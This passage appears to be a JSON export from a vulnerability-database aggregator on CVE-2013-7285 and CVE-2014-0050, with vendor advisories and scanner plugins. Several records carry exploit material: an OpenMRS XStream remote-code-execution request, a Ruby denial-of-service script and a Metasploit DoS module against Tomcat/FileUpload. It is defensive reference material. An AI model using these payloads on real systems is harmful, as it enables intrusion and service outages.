script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/03/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/03/28\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Amazon Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/AmazonLinux/release\", \"Host/AmazonLinux/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/AmazonLinux/release\");\nif (isnull(release) || !strlen(release)) audit(AUDIT_OS_NOT, \"Amazon Linux\");\nos_ver = pregmatch(pattern: \"^AL(A|\\d)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Amazon Linux\");\nos_ver = os_ver[1];\nif (os_ver != \"A\")\n{\n if (os_ver == 'A') os_ver = 'AMI';\n audit(AUDIT_OS_NOT, \"Amazon Linux AMI\", \"Amazon Linux \" + os_ver);\n}\n\nif (!get_kb_item(\"Host/AmazonLinux/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (rpm_check(release:\"ALA\", reference:\"tomcat7-7.0.47-1.38.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"tomcat7-admin-webapps-7.0.47-1.38.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"tomcat7-docs-webapp-7.0.47-1.38.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"tomcat7-el-2.2-api-7.0.47-1.38.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"tomcat7-javadoc-7.0.47-1.38.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"tomcat7-jsp-2.2-api-7.0.47-1.38.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"tomcat7-lib-7.0.47-1.38.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", 
reference:\"tomcat7-servlet-3.0-api-7.0.47-1.38.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"tomcat7-webapps-7.0.47-1.38.amzn1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"tomcat7 / tomcat7-admin-webapps / tomcat7-docs-webapp / etc\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "packetstorm": [{"lastseen": "2016-12-05T22:15:55", "description": "", "published": "2016-01-06T00:00:00", "type": "packetstorm", "title": "OpenMRS Reporting Module 0.9.7 Remote Code Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-7285"], "modified": "2016-01-06T00:00:00", "id": "PACKETSTORM:135150", "href": "https://packetstormsecurity.com/files/135150/OpenMRS-Reporting-Module-0.9.7-Remote-Code-Execution.html", "sourceData": "`Title: Unauthenticated remote code execution in OpenMRS \nProduct: OpenMRS \nVendor: OpenMRS Inc. \nTested versions: See summary \nStatus: Fixed by vendor \nReported by: Brian D. Hysell \n \nProduct description: \n \nOpenMRS is \"the world's leading open source enterprise electronic \nmedical record system platform.\" \n \nVulnerability summary: \n \nThe OpenMRS Reporting Module 0.9.7 passes untrusted XML input to a \nversion of the XStream library vulnerable to CVE-2013-7285, making it \nvulnerable to remote code execution. If the Appointment Scheduling UI \nModule 1.0.3 is also installed, this RCE is accessible to \nunauthenticated attackers. OpenMRS Standalone 2.3 and OpenMRS Platform \n1.11.4 WAR with Reporting 0.9.7 and Appointment Scheduling UI 1.0.3 \ninstalled were confirmed to be vulnerable; other versions and \nconfigurations containing these modules are likely to be vulnerable as \nwell (see \"Remediation\"). 
\n \nDetails: \n \nIn the Reporting module, the method saveSerializedDefinition (mapped \nto module/reporting/definition/saveSerializedDefinition) in \nInvalidSerializedDefinitionController can be accessed by an \nunauthenticated user. \n \nThe attacker must provide a valid UUID for a definition present in \nOpenMRS or a NullPointerException will be thrown before the remote \ncode execution can take place. However, upon initialization the \nAppointments Scheduling UI module inserts a definition with a constant \nUUID hard-coded into AppointmentSchedulingUIConstants \n(c1bf0730-e69e-11e3-ac10-0800200c9a66). \n \nProof of concept: \n \nGET /openmrs-standalone/module/reporting/definition/saveSerializedDefinition.form?type=org.openmrs.OpenmrsObject&serializationClass=org.openmrs.module.serialization.xstream.XStreamSerializer&serializedData=<dynamic-proxy><interface>org.openmrs.OpenmrsObject</interface><handler%20class%3d\"java.beans.EventHandler\"><target%20class%3d\"java.lang.ProcessBuilder\"><command><string>calc.exe</string></command></target><action>start</action></handler></dynamic-proxy>&uuid=c1bf0730-e69e-11e3-ac10-0800200c9a66&name=test&subtype=org.openmrs.OpenmrsObject \n \nRemediation: \n \nThe vendor has addressed this issue in OpenMRS Standalone 2.3.1, \nOpenMRS Reference Application 2.3.1, and OpenMRS Platform 1.11.5, \n1.10.3, and 1.9.10. \n \nTimeline: \n \nVendor contacted: November 2, 2015 \nVendor replied: November 3 \nCVE requested: November 14 (no response) \nPatch released: December 2 \nAnnounced: January 6, 2016 \n \n \n`\n", "cvss": {"score": 5.5, "vector": "AV:NETWORK/AC:MEDIUM/Au:UNKNOWN/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://packetstormsecurity.com/files/download/135150/openmrs-exec.txt"}], "exploitdb": [{"lastseen": "2016-02-04T09:41:24", "description": "OpenMRS Reporting Module 0.9.7 - Remote Code Execution. CVE-2013-7285. 
Webapps exploit for java platform", "published": "2016-01-07T00:00:00", "type": "exploitdb", "title": "OpenMRS Reporting Module 0.9.7 - Remote Code Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-7285"], "modified": "2016-01-07T00:00:00", "id": "EDB-ID:39193", "href": "https://www.exploit-db.com/exploits/39193/", "sourceData": "Title: Unauthenticated remote code execution in OpenMRS\r\nProduct: OpenMRS\r\nVendor: OpenMRS Inc.\r\nTested versions: See summary\r\nStatus: Fixed by vendor\r\nReported by: Brian D. Hysell\r\n\r\nProduct description:\r\n\r\nOpenMRS is \"the world's leading open source enterprise electronic\r\nmedical record system platform.\"\r\n\r\nVulnerability summary:\r\n\r\nThe OpenMRS Reporting Module 0.9.7 passes untrusted XML input to a\r\nversion of the XStream library vulnerable to CVE-2013-7285, making it\r\nvulnerable to remote code execution. If the Appointment Scheduling UI\r\nModule 1.0.3 is also installed, this RCE is accessible to\r\nunauthenticated attackers. OpenMRS Standalone 2.3 and OpenMRS Platform\r\n1.11.4 WAR with Reporting 0.9.7 and Appointment Scheduling UI 1.0.3\r\ninstalled were confirmed to be vulnerable; other versions and\r\nconfigurations containing these modules are likely to be vulnerable as\r\nwell (see \"Remediation\").\r\n\r\nDetails:\r\n\r\nIn the Reporting module, the method saveSerializedDefinition (mapped\r\nto module/reporting/definition/saveSerializedDefinition) in\r\nInvalidSerializedDefinitionController can be accessed by an\r\nunauthenticated user.\r\n\r\nThe attacker must provide a valid UUID for a definition present in\r\nOpenMRS or a NullPointerException will be thrown before the remote\r\ncode execution can take place. 
However, upon initialization the\r\nAppointments Scheduling UI module inserts a definition with a constant\r\nUUID hard-coded into AppointmentSchedulingUIConstants\r\n(c1bf0730-e69e-11e3-ac10-0800200c9a66).\r\n\r\nProof of concept:\r\n\r\nGET /openmrs-standalone/module/reporting/definition/saveSerializedDefinition.form?type=org.openmrs.OpenmrsObject&serializationClass=org.openmrs.module.serialization.xstream.XStreamSerializer&serializedData=<dynamic-proxy><interface>org.openmrs.OpenmrsObject</interface><handler%20class%3d\"java.beans.EventHandler\"><target%20class%3d\"java.lang.ProcessBuilder\"><command><string>calc.exe</string></command></target><action>start</action></handler></dynamic-proxy>&uuid=c1bf0730-e69e-11e3-ac10-0800200c9a66&name=test&subtype=org.openmrs.OpenmrsObject\r\n\r\nRemediation:\r\n\r\nThe vendor has addressed this issue in OpenMRS Standalone 2.3.1,\r\nOpenMRS Reference Application 2.3.1, and OpenMRS Platform 1.11.5,\r\n1.10.3, and 1.9.10.\r\n\r\nTimeline:\r\n\r\nVendor contacted: November 2, 2015\r\nVendor replied: November 3\r\nCVE requested: November 14 (no response)\r\nPatch released: December 2\r\nAnnounced: January 6, 2016", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/39193/"}, {"lastseen": "2016-02-03T15:04:57", "description": "Apache Commons FileUpload and Apache Tomcat - Denial-of-Service. CVE-2014-0050. 
Dos exploits for multiple platform", "published": "2014-02-12T00:00:00", "type": "exploitdb", "title": "Apache Commons FileUpload and Apache Tomcat - Denial-of-Service", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-0050"], "modified": "2014-02-12T00:00:00", "id": "EDB-ID:31615", "href": "https://www.exploit-db.com/exploits/31615/", "sourceData": "#################################################################################\r\n# CVE-2014-0050 Apache Commons FileUpload and Apache Tomcat Denial-of-Service\t#\r\n# \t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t#\r\n# Author: Oren Hafif, Trustwave SpiderLabs Research\t\t\t\t\t\t\t\t#\r\n# This is a Proof of Concept code that was created for the sole purpose \t\t#\r\n# of assisting system administrators in evaluating whether their applications \t#\r\n# are vulnerable to this issue or not\t\t\t\t\t\t\t\t\t\t\t#\r\n# \t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t#\r\n# Please use responsibly.\t\t\t\t\t\t\t\t\t\t\t\t\t\t#\r\n#################################################################################\r\n\r\n\r\nrequire 'net/http'\r\nrequire 'net/https'\r\nrequire 'optparse'\r\nrequire 'openssl'\r\n\r\n\r\noptions = {}\r\n\r\nopt_parser = OptionParser.new do |opt|\r\n opt.banner = \"Usage: ./CVE-2014-0050.rb [OPTIONS]\"\r\n opt.separator \"\"\r\n opt.separator \"Options\"\r\n opt.on(\"-u\",\"--url URL\",\"The url of the Servlet/JSP to test for Denial of Service\") do |url|\r\n options[:url] = url\r\n end\r\n\r\n opt.on(\"-n\",\"--number_of_requests NUMBER_OF_REQUSETS\",\"The number of requests to send to the server. 
The default value is 10\") do |number_of_requests|\r\n options[:number_of_requests] = number_of_requests\r\n end\r\n\r\n opt.on(\"-h\",\"--help\",\"help\") do\r\n \tputs \"\"\r\n puts \"#################################################################################\"\r\n\tputs \"# CVE-2014-0050 Apache Commons FileUpload and Apache Tomcat Denial-of-Service #\"\r\n\tputs \"# #\"\r\n\tputs \"# Author: Oren Hafif, Trustwave SpiderLabs Research #\"\r\n\tputs \"# This is a Proof of Concept code that was created for the sole purpose #\"\r\n\tputs \"# of assisting system administrators in evaluating whether or not #\"\r\n\tputs \"# their applications are vulnerable to this issue. #\"\r\n\tputs \"# #\"\r\n\tputs \"# Please use responsibly. #\"\r\n\tputs \"#################################################################################\"\r\n puts \"\"\r\n puts opt_parser\r\n puts \"\"\r\n \r\n\texit\r\n end\r\nend\r\n\r\nopt_parser.parse!\r\n\r\n\r\nuri = \"\"\r\nbegin\r\n\turi = URI.parse(options[:url])\r\nrescue Exception => e\r\n\tputs \"\"\r\n\tputs \"ERROR: Invalid URL was entered #{options[:url]}\"\r\n\tputs \"\"\r\n puts opt_parser\r\n exit\r\nend\r\n\r\nnumber_of_requests = 10;\r\nif(options[:number_of_requests] != nil)\r\n\tbegin\r\n\t\tnumber_of_requests = Integer( options[:number_of_requests] )\r\n\t\tthrow Exception.new if number_of_requests <= 0 \r\n\trescue Exception => e\r\n\t\tputs e\r\n\t\tputs \"\"\r\n\t\tputs \"ERROR: Invalid NUMBER_OF_REQUSETS was entered #{options[:number_of_requests]}\"\r\n\t\tputs \"\"\r\n\t puts opt_parser\r\n\t exit\r\n\tend\r\nend\r\n\r\n#uri = URI.parse(uri)\r\n\r\n\r\nputs \"\"\r\nputs \"WARNING: Usage of this tool for attack purposes is forbidden - press Ctrl-C now to abort...\"\r\ni=10\r\ni.times { print \"#{i.to_s}...\";sleep 1; i-=1;}\r\nputs \"\"\r\n\r\n\r\nnumber_of_requests.times do \r\n\tbegin\r\n\tputs \"Request Launched\"\r\n\thttps = Net::HTTP.new(uri.host,uri.port)\r\n\thttps.use_ssl = 
uri.scheme==\"https\"\r\n\thttps.verify_mode = OpenSSL::SSL::VERIFY_NONE\r\n\treq = Net::HTTP::Post.new(uri.path)\r\n\treq.add_field(\"Content-Type\",\"multipart/form-data; boundary=#{\"a\"*4092}\")\r\n\treq.add_field(\"lf-None-Match\",\"59e532f501ac13174dd9c488f897ee75\")\r\n\treq.body = \"b\"*4097\r\n\thttps.read_timeout = 1 \r\n\tres = https.request(req)\r\n\trescue Timeout::Error=>e\r\n\t\tputs \"Timeout - continuing DoS...\"\r\n\trescue Exception=>e\r\n\t\tputs e.inspect\r\n\tend\r\nend\r\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/31615/"}], "github": [{"lastseen": "2020-03-10T23:26:02", "bulletinFamily": "software", "cvelist": ["CVE-2013-7285"], "description": "Xstream API versions up to 1.4.6 and version 1.4.10, if the security framework has not been initialized, may allow a remote attacker to run arbitrary shell commands by manipulating the processed input stream when unmarshaling XML or any supported format. e.g. 
JSON.", "edition": 2, "modified": "2019-10-10T20:53:00", "published": "2019-05-29T18:05:03", "id": "GHSA-F554-X222-WGF7", "href": "https://github.com/advisories/GHSA-f554-x222-wgf7", "title": "Critical severity vulnerability that affects com.thoughtworks.xstream:xstream", "type": "github", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-03-10T23:26:10", "bulletinFamily": "software", "cvelist": ["CVE-2014-0002"], "description": "The XSLT component in Apache Camel before 2.11.4 and 2.12.x before 2.12.3 allows remote attackers to read arbitrary files and possibly have other unspecified impact via an XML document containing an external entity declaration in conjunction with an entity reference, related to an XML External Entity (XXE) issue.", "edition": 2, "modified": "2019-07-03T21:02:04", "published": "2018-10-16T23:13:26", "id": "GHSA-2FW5-RVF2-JQ56", "href": "https://github.com/advisories/GHSA-2fw5-rvf2-jq56", "title": "High severity vulnerability that affects org.apache.camel:camel-core", "type": "github", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-03-10T23:26:10", "bulletinFamily": "software", "cvelist": ["CVE-2014-0003"], "description": "The XSLT component in Apache Camel 2.11.x before 2.11.4, 2.12.x before 2.12.3, and possibly earlier versions allows remote attackers to execute arbitrary Java methods via a crafted message.", "edition": 2, "modified": "2019-07-03T21:02:04", "published": "2018-10-16T23:13:49", "id": "GHSA-H6RP-8V4J-HWPH", "href": "https://github.com/advisories/GHSA-h6rp-8v4j-hwph", "title": "High severity vulnerability that affects org.apache.camel:camel-core", "type": "github", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-03-10T23:26:06", "bulletinFamily": "software", "cvelist": ["CVE-2014-0050"], "description": "MultipartStream.java in Apache Commons FileUpload before 1.3.1, as used in Apache Tomcat, JBoss Web, and other products, 
allows remote attackers to cause a denial of service (infinite loop and CPU consumption) via a crafted Content-Type header that bypasses a loop's intended exit conditions.", "edition": 2, "modified": "2019-07-03T21:02:05", "published": "2018-12-21T17:51:42", "id": "GHSA-XX68-JFCG-XMMF", "href": "https://github.com/advisories/GHSA-xx68-jfcg-xmmf", "title": "High severity vulnerability that affects commons-fileupload:commons-fileupload", "type": "github", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "fedora": [{"lastseen": "2020-12-21T08:17:52", "bulletinFamily": "unix", "cvelist": ["CVE-2013-7285"], "description": "XStream is a simple library to serialize objects to XML and back again. A high level facade is supplied that simplifies common use cases. Custom objects can be serialized without need for specifying mappings. Speed and low memory footprint are a crucial part of the design, making it suitable for large object graphs or systems with high message throughput. No information is duplicated that can be obtained via reflection. This results in XML that is easier to read for humans and more compact than native Java serialization. XStream serializes internal fields, including private and final. Supports non-public and inner classes. Classes are not required to have default constructor. Duplicate references encountered in the object-model will be maintained. Supports circular references. By implementing an interface, XStream can serialize directly to/from any tree structure (not just XML). Strategies can be registered allowing customization of how particular types are represented as XML. When an exception occurs due to malformed XML, detailed diagnostics are provided to help isolate and fix the problem. 
", "modified": "2014-02-22T00:47:06", "published": "2014-02-22T00:47:06", "id": "FEDORA:CB46E23C05", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 20 Update: xstream-1.3.1-9.fc20", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:52", "bulletinFamily": "unix", "cvelist": ["CVE-2013-7285"], "description": "XStream is a simple library to serialize objects to XML and back again. A high level facade is supplied that simplifies common use cases. Custom objects can be serialized without need for specifying mappings. Speed and low memory footprint are a crucial part of the design, making it suitable for large object graphs or systems with high message throughput. No information is duplicated that can be obtained via reflection. This results in XML that is easier to read for humans and more compact than native Java serialization. XStream serializes internal fields, including private and final. Supports non-public and inner classes. Classes are not required to have default constructor. Duplicate references encountered in the object-model will be maintained. Supports circular references. By implementing an interface, XStream can serialize directly to/from any tree structure (not just XML). Strategies can be registered allowing customization of how particular types are represented as XML. When an exception occurs due to malformed XML, detailed diagnostics are provided to help isolate and fix the problem. ", "modified": "2014-02-22T00:56:20", "published": "2014-02-22T00:56:20", "id": "FEDORA:04A5C23F7A", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 19 Update: xstream-1.3.1-5.1.fc19", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:52", "bulletinFamily": "unix", "cvelist": ["CVE-2014-0050"], "description": "The javax.servlet package lacks support for rfc 1867, html file upload. This package provides a simple to use api for working with such data. 
The scope of this package is to create a package of Java utility classes to read multipart/form-data within a javax.servlet.http.HttpServletRequest ", "modified": "2014-02-17T21:06:10", "published": "2014-02-17T21:06:10", "id": "FEDORA:EA6192175F", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 20 Update: apache-commons-fileupload-1.3-5.fc20", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:52", "bulletinFamily": "unix", "cvelist": ["CVE-2014-0050"], "description": "The javax.servlet package lacks support for rfc 1867, html file upload. This package provides a simple to use api for working with such data. The scope of this package is to create a package of Java utility classes to read multipart/form-data within a javax.servlet.http.HttpServletRequest ", "modified": "2014-02-17T21:07:04", "published": "2014-02-17T21:07:04", "id": "FEDORA:58AC321FC4", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 19 Update: apache-commons-fileupload-1.3-5.fc19", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "atlassian": [{"lastseen": "2017-03-22T18:16:53", "bulletinFamily": "software", "cvelist": ["CVE-2014-0050"], "edition": 1, "description": "Apache commons-fileupload 1.3.1 was released this weekend with a fix for CVE-2014-0050, involving a DoS attack when using specially crafted multipart requests. 
We need to determine if Confluence is vulnerable, and if so, upgrade to this version of the library.", "modified": "2017-02-17T04:33:34", "published": "2014-02-10T05:56:15", "href": "https://jira.atlassian.com/browse/CONF-32557", "id": "ATLASSIAN:CONF-32557", "title": "Security vulnerability in apache commons fileupload", "type": "atlassian", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2020-12-24T14:35:32", "bulletinFamily": "software", "cvelist": ["CVE-2014-0050"], "description": "Apache commons-fileupload 1.3.1 was released this weekend with a fix for CVE-2014-0050, involving a DoS attack when using specially crafted multipart requests. We need to determine if Confluence is vulnerable, and if so, upgrade to this version of the library.", "edition": 9, "modified": "2018-10-11T08:42:37", "published": "2014-02-10T05:56:15", "id": "ATLASSIAN:CONFSERVER-32557", "href": "https://jira.atlassian.com/browse/CONFSERVER-32557", "title": "Security vulnerability in apache commons fileupload", "type": "atlassian", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "amazon": [{"lastseen": "2020-11-10T12:34:47", "bulletinFamily": "unix", "cvelist": ["CVE-2014-0050"], "description": "**Issue Overview:**\n\nMultipartStream.java in Apache Commons FileUpload before 1.3.1, as used in Apache Tomcat, JBoss Web, and other products, allows remote attackers to cause a denial of service (infinite loop and CPU consumption) via a crafted Content-Type header that bypasses a loop's intended exit conditions. 
\n\n \n**Affected Packages:** \n\n\ntomcat7\n\n \n**Issue Correction:** \nRun _yum update tomcat7_ to update your system.\n\n \n\n\n**New Packages:**\n \n \n noarch: \n tomcat7-docs-webapp-7.0.47-1.38.amzn1.noarch \n tomcat7-7.0.47-1.38.amzn1.noarch \n tomcat7-lib-7.0.47-1.38.amzn1.noarch \n tomcat7-webapps-7.0.47-1.38.amzn1.noarch \n tomcat7-el-2.2-api-7.0.47-1.38.amzn1.noarch \n tomcat7-javadoc-7.0.47-1.38.amzn1.noarch \n tomcat7-jsp-2.2-api-7.0.47-1.38.amzn1.noarch \n tomcat7-admin-webapps-7.0.47-1.38.amzn1.noarch \n tomcat7-servlet-3.0-api-7.0.47-1.38.amzn1.noarch \n \n src: \n tomcat7-7.0.47-1.38.amzn1.src \n \n \n", "edition": 4, "modified": "2014-03-24T23:36:00", "published": "2014-03-24T23:36:00", "id": "ALAS-2014-312", "href": "https://alas.aws.amazon.com/ALAS-2014-312.html", "title": "Medium: tomcat7", "type": "amazon", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "debian": [{"lastseen": "2020-11-11T13:29:47", "bulletinFamily": "unix", "cvelist": ["CVE-2014-0050"], "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-2856-1 security@debian.org\nhttp://www.debian.org/security/ Florian Weimer\nFebruary 07, 2014 http://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : libcommons-fileupload-java\nVulnerability : denial of service\nProblem type : remote\nDebian-specific: no\nCVE ID : CVE-2014-0050\n\nIt was discovered that the Apache Commons FileUpload package for Java\ncould enter an infinite loop while processing a multipart request with\na crafted Content-Type, resulting in a denial-of-service condition.\n\nFor the oldstable distribution (squeeze), this problem has been fixed in\nversion 1.2.2-1+deb6u2.\n\nFor the stable distribution (wheezy), this problem has been fixed in\nversion 1.2.2-1+deb7u2.\n\nFor the unstable distribution (sid), this problem has been fixed in\nversion 1.3.1-1.\n\nWe recommend 
that you upgrade your libcommons-fileupload-java packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: http://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n", "edition": 4, "modified": "2014-02-07T22:59:26", "published": "2014-02-07T22:59:26", "id": "DEBIAN:DSA-2856-1:D2DA2", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2014/msg00026.html", "title": "[SECURITY] [DSA 2856-1] libcommons-fileupload-java security update", "type": "debian", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "metasploit": [{"lastseen": "2020-10-08T00:36:32", "description": "This module triggers an infinite loop in Apache Commons FileUpload 1.0 through 1.3 via a specially crafted Content-Type header. Apache Tomcat 7 and Apache Tomcat 8 use a copy of FileUpload to handle mime-multipart requests, therefore, Apache Tomcat 7.0.0 through 7.0.50 and 8.0.0-RC1 through 8.0.1 are affected by this issue. 
Tomcat 6 also uses Commons FileUpload as part of the Manager application.\n", "published": "2014-02-22T13:56:59", "type": "metasploit", "title": "Apache Commons FileUpload and Apache Tomcat DoS", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-0050"], "modified": "2020-10-02T20:00:37", "id": "MSF:AUXILIARY/DOS/HTTP/APACHE_COMMONS_FILEUPLOAD_DOS", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpClient\n include Msf::Auxiliary::Dos\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Apache Commons FileUpload and Apache Tomcat DoS',\n 'Description' => %q{\n This module triggers an infinite loop in Apache Commons FileUpload 1.0\n through 1.3 via a specially crafted Content-Type header.\n Apache Tomcat 7 and Apache Tomcat 8 use a copy of FileUpload to handle\n mime-multipart requests, therefore, Apache Tomcat 7.0.0 through 7.0.50\n and 8.0.0-RC1 through 8.0.1 are affected by this issue. 
Tomcat 6 also\n uses Commons FileUpload as part of the Manager application.\n },\n 'Author' =>\n [\n 'Unknown', # This issue was reported to the Apache Software Foundation and accidentally made public.\n 'ribeirux' # metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n ['CVE', '2014-0050'],\n ['URL', 'http://tomcat.apache.org/security-8.html'],\n ['URL', 'http://tomcat.apache.org/security-7.html']\n ],\n 'DisclosureDate' => '2014-02-06'\n ))\n\n register_options(\n [\n Opt::RPORT(8080),\n OptString.new('TARGETURI', [ true, \"The request URI\", '/']),\n OptInt.new('RLIMIT', [ true, \"Number of requests to send\",50])\n ])\n end\n\n def run\n boundary = \"0\"*4092\n opts = {\n 'method' => \"POST\",\n 'uri' => normalize_uri(target_uri.to_s),\n 'ctype' => \"multipart/form-data; boundary=#{boundary}\",\n 'data' => \"#{boundary}00000\",\n 'headers' => {\n 'Accept' => '*/*'\n }\n }\n\n # XXX: There is rarely, if ever, a need for a 'for' loop in Ruby\n # This should be rewritten with 1.upto() or Enumerable#each or\n # something\n for x in 1..datastore['RLIMIT']\n print_status(\"Sending request #{x} to #{peer}\")\n begin\n c = connect\n r = c.request_cgi(opts)\n c.send_request(r)\n # Don't wait for a response\n rescue ::Rex::ConnectionError => exception\n print_error(\"Unable to connect: '#{exception.message}'\")\n return\n ensure\n disconnect(c) if c\n end\n end\n end\nend\n\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/dos/http/apache_commons_fileupload_dos.rb"}], "suse": [{"lastseen": "2016-09-04T11:49:41", "bulletinFamily": "unix", "cvelist": ["CVE-2014-0050"], "description": "This update fixes a security issue with\n jakarta-commons-fileupload:\n\n * bnc#862781: denial of service due to too-small buffer\n size used (CVE-2014-0050)\n", "edition": 1, "modified": "2014-04-17T21:04:15", "published": "2014-04-17T21:04:15", "id": 
"SUSE-SU-2014:0548-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2014-04/msg00015.html", "title": "Security update for jakarta-commons-fileupload (important)", "type": "suse", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "jvn": [{"lastseen": "2019-05-29T19:49:22", "bulletinFamily": "info", "cvelist": ["CVE-2014-0050"], "description": "\n ## Description\n\nApache Commons FileUpload provided by Apache Software Foundation contains an issue in processing a multi-part request, which may cause the process to be in an infinite loop. \n \nAs of 2014 February 12, an exploit tool to attack against this vulnerability has been confirmed.\n\n ## Impact\n\nProcessing a malformed request may cause the condition that the target system does not respond.\n\n ## Solution\n\n**Update the Software** \nUpdate to the latest version that contains a fix for this vulnerability: \n\n * [Apache Commons FileUpload 1.3.1](<http://commons.apache.org/proper/commons-fileupload/download_fileupload.cgi>)\n * [Apache Tomcat 8.0.3](<http://www.apache.org/dist/tomcat/tomcat-8/v8.0.3/>)\n * [Apache Tomcat 7.0.52](<http://www.apache.org/dist/tomcat/tomcat-7/v7.0.52/>)\n * [Apache Struts 2.3.16.1](<http://struts.apache.org/download.cgi#struts23161>)\n**Apply the Patch** \nIn the developer's repository, the respective source code that contains a fix for this vulnerability has been released. \n\n * Apache Commons FileUpload: <http://svn.apache.org/r1565143>\n * Apache Tomcat 8: <http://svn.apache.org/r1565163>\n * Apache Tomcat 7: <http://svn.apache.org/r1565169>\n**Workaround** \nApplying the following workaround may mitigate the effect of this vulnerability. \n\n * Limit the Content-Type header size less than 4091 bytes\nFor more information, please refer to the developer's site. 
\n\n ## Products Affected\n\n * Commons FileUpload 1.0 to 1.3\n * Apache Tomcat 8.0.0-RC1 to 8.0.1\n * Apache Tomcat 7.0.0 to 7.0.50\n * Products that use Apache Commons FileUpload\nAccording to the developer, Apache Tomcat 6 and earlier are not affected. \n \nThe developer also states that Apache Commons FileUpload is widely used for multiple Apache products, therefore, multiple Apache products other than Apache Tomcat may be affected by this vulnerability. \nAccording to the developer, the following products may be affected. \n\n * Jenkins\n * JSPWiki\n * JXP\n * Lucene-Solr\n * onemind-commons\n * Spring\n * Stapler\n * Struts 1, 2\n * WSDL2c\n", "edition": 4, "modified": "2016-07-12T00:00:00", "published": "2014-02-10T00:00:00", "id": "JVN:14876762", "href": "http://jvn.jp/en/jp/JVN14876762/index.html", "title": "JVN#14876762: Apache Commons FileUpload vulnerable to denial-of-service (DoS)", "type": "jvn", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "freebsd": [{"lastseen": "2019-05-29T18:33:30", 